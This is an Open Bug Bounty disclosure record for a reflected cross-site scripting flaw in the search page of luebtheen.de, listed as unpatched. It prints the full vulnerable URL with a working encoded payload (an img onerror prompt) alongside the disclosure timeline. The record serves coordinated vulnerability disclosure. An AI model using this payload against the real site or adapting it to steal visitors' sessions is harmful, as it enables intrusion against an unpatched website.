luebtheen.de XSS vulnerability

2017-05-10T15:26:00
ID OBB:234641
Type openbugbounty
Reporter secuninja
Modified 2017-06-08T06:14:00

Description

Vulnerable URL:
http://www.luebtheen.de/suche/?q=suche%2F%3Fterm%3D%3E%27%3E%22%3Es%3Ci%3Ei%3Cimg+src%3Dx+#q=a%3E%27%3E%22%3Et%3Ci%3Ep%3Cimg%20src=y%20onerror=prompt(/OPENBUGBOUNTY/)%3E&sort;=score+desc
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 31.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 7766937
VIP website status:| No
Check luebtheen.de SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 10 May, 2017 15:26 GMT
Vulnerability existence verified and confirmed| 11 May, 2017 05:31 GMT
Generic security notifications sent to website owner| 11 May, 2017 05:31 GMT
Vulnerability details disclosed by researcher| 8 June, 2017 06:14 GMT